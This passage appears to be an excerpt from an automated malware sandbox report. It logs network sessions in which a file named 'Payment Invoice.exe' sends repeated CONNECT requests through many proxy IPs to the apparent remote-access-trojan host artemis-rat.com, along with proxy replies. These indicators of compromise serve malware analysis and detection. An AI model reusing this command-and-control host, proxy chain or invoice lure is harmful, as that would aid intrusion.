                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.323564053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:10.323586941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:34.323671103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:22.323649883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1659192.168.2.45432982.113.157.122312807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.105480909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.216959953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.277045012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.337413073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.386080980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.386101961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:10.386122942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:34.386104107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1660192.168.2.454458192.163.200.93353967076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.105537891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.216978073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.277045012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.337431908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.387315989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.386106014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:10.386300087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:34.386238098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:22.402698040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1661192.168.2.4549548.217.143.187156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.105587006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1662192.168.2.454932103.216.49.23380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.106698990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1663192.168.2.454972161.97.173.42539487076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.106790066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.826308966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.824340105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714646101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1664192.168.2.454971207.180.234.220428237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.106812000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.786060095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.777242899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.776973009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.564016104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.277035952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.089510918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.386109114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1665192.168.2.454935103.118.44.13680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.106882095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1666192.168.2.45498251.15.211.42163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.106882095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.826175928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.824122906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714519978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.214803934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.155896902 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1667192.168.2.45497085.239.121.16841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.107192993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1668192.168.2.454373106.75.217.31807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.107212067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.216975927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.277045965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.337435007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.386081934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.386110067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:10.386320114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:34.386245012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:22.401787043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1669192.168.2.455009158.255.215.5090057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.107284069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.411307096 CET339INHTTP/1.1 403 Forbidden
                                                                Server: squid/4.7
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 5
                                                                X-Squid-Error: TCP_RESET 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                X-Cache: MISS from proxy.wakoopa.com
                                                                Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                Connection: keep-alive
                                                                Data Raw: 72 65 73 65 74
                                                                Data Ascii: reset


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1670192.168.2.454958146.59.70.29229757076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.108402967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.826472044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.011501074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1671192.168.2.454953190.103.177.131807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.108462095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.486149073 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1672192.168.2.454260132.255.50.12631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.108547926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.899473906 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1673192.168.2.45436547.184.175.16431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.327855110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.580718040 CET1286INHTTP/1.1 503 Service Unavailable
                                                                Server: squid/4.14
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:35 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3776
                                                                X-Squid-Error: ERR_DNS_FAIL 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
